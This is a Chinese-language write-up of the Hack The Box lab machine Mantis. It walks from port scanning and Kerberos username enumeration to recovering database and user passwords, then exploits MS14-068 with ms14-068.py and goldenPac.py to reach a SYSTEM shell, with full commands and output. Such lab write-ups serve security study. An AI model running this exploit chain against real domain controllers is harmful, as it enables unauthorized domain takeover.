打靶记录(一五八)之HTBMantis

端口扫描

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 20:24 CST
Warning: 10.10.10.52 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.52
Host is up (0.078s latency).
Not shown: 65463 closed tcp ports (reset), 45 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49162/tcp open  unknown
49166/tcp open  unknown
49175/tcp open  unknown
50255/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49162,49166,49175,50255 10.10.10.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 20:28 CST
Nmap scan report for 10.10.10.52
Host is up (0.068s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-26 12:17:50Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1337/tcp  open  http         Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.10.52:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
|_ssl-date: 2024-09-26T12:19:01+00:00; -10m59s from scanner time.
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-26T12:10:47
|_Not valid after:  2054-09-26T12:10:47
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad - Blog
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
49166/tcp open  msrpc        Microsoft Windows RPC
49175/tcp open  msrpc        Microsoft Windows RPC
50255/tcp open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info: 
|   10.10.10.52:50255: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 50255
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-26T12:10:47
|_Not valid after:  2054-09-26T12:10:47
|_ssl-date: 2024-09-26T12:19:01+00:00; -10m59s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.10.52:50255: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%), Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate (96%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (96%), Microsoft Windows Vista Business (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 23m18s, deviation: 1h30m44s, median: -10m59s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2024-09-26T08:18:54-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-09-26T12:18:51
|_  start_date: 2024-09-26T12:10:42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.55 seconds

添加hosts

Enum

探测了一下DNS,smb,ldap都没有结果

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ kerbrute userenum /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -d htb.local --dc 10.10.10.52

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/26/24 - Ronnie Flathers @ropnop

2024/09/26 20:49:48 >  Using KDC(s):
2024/09/26 20:49:48 >   10.10.10.52:88

2024/09/26 20:49:53 >  [+] VALID USERNAME:       james@htb.local
2024/09/26 20:50:08 >  [+] VALID USERNAME:       James@htb.local
2024/09/26 20:50:33 >  [+] VALID USERNAME:       administrator@htb.local
2024/09/26 20:50:47 >  [+] VALID USERNAME:       mantis@htb.local
2024/09/26 20:51:38 >  [+] VALID USERNAME:       JAMES@htb.local
2024/09/26 20:53:53 >  [+] VALID USERNAME:       Administrator@htb.local

能列举出这几个用户名

1337和8080都开着web服务，都是IIS，稍微扫描一下目录

1337有一个/secure_notes/目录，第一个是一个文本,告知了安装了MSSQL2014并且创建了”admin”账户，8080开的是一个OrchardCMS服务，并且文件名base64解码之后是m$$ql_S@_P@ssW0rd!，猜测是数据库密码

并且页面的最底下还有几行字，但是暂时不清楚有什么用处

OrchardCMS有一个无关紧要的CSS，先放一边。连接数据库查看

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ mssqlclient.py admin@10.10.10.52                 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL (admin  admin@master)> 

数据有点多，入坑了dbeaver，真好用(赞赏)。说一下使用肯能遇到的问题，首先需要sudo运行安装一下连接驱动。然后如果显示TLS版本问题那么更改使用的jdk对应的/conf/security/java.security,搜索jdk.tls.disabledAlgorithms=SSLv3然后将其中的TLSv1, TLSv1.1配置删除掉即可

在blog_Orchard_Users_UserPartRecord表中找到了james用户的密码J@m3s_P@ssW0rd!

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' --shares
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
SMB         10.10.10.52     445    MANTIS           [+] Enumerated shares
SMB         10.10.10.52     445    MANTIS           Share           Permissions     Remark
SMB         10.10.10.52     445    MANTIS           -----           -----------     ------
SMB         10.10.10.52     445    MANTIS           ADMIN$                          Remote Admin
SMB         10.10.10.52     445    MANTIS           C$                              Default share
SMB         10.10.10.52     445    MANTIS           IPC$                            Remote IPC
SMB         10.10.10.52     445    MANTIS           NETLOGON        READ            Logon server share                                                                                                    
SMB         10.10.10.52     445    MANTIS           SYSVOL          READ            Logon server share 

然而进行一番枚举之后，没有任何有用的消息。

MS14-068

进行一个域的信息探测,可以发现版本是server 2008 R2,是比较老了

┌──(mikannse㉿kali)-[~/HTB/mantis]
└─$ ldapdomaindump mantis.htb.local -u 'mantis.htb.local\james' -p 'J@m3s_P@ssW0rd!' -n 10.10.10.52

目前拥有了一对域用户的凭证，可以尝试MS14-068

需要域用户的sid来生成黄金票据,在生成的user.json能找到

S-1-5-21-4220043660-4019079961-2895681657-1103

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains git clone https://github.com/mubix/pykek.git

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:

运行可能会报像是这样的错

sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
  File "ms14-068.py", line 48, in sploit
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
  File "/home/mikannse/tools/domain/pykek/kek/krb5.py", line 431, in decrypt_as_rep
    return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
  File "/home/mikannse/tools/domain/pykek/kek/krb5.py", line 419, in _decrypt_rep
    rep = decode(data, asn1Spec=spec)[0]
  File "/home/mikannse/tools/domain/pykek/pyasn1/codec/ber/decoder.py", line 79

这是时钟问题,调整时钟后解决

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ sudo timedatectl set-ntp off 
                                                                                                     
┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ sudo rdate -n 10.10.10.52  
Thu Sep 26 23:48:20 CST 2024

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password: 
  [+] Building AS-REQ for mantis.htb.local... Done!
  [+] Sending AS-REQ to mantis.htb.local... Done!
  [+] Receiving AS-REP from mantis.htb.local... Done!
  [+] Parsing AS-REP from mantis.htb.local... Done!
  [+] Building TGS-REQ for mantis.htb.local... Done!
  [+] Sending TGS-REQ to mantis.htb.local... Done!
  [+] Receiving TGS-REP from mantis.htb.local... Done!
  [+] Parsing TGS-REP from mantis.htb.local... Done!
  [+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!

获取到了james的黄金票据,传递票据来获取shell

┌──(mikannse㉿kali)-[~/tools/domain/pykek]
└─$ goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis.htb.local'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
/usr/share/doc/python3-impacket/examples/goldenPac.py:721: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
/usr/share/doc/python3-impacket/examples/goldenPac.py:747: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file WXBAGAqh.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service vxAb on mantis.htb.local.....
[*] Starting service vxAb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

碎碎念

主要是了解一下这个漏洞，虽然是比较老的洞了

具体可见: https://learn.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-068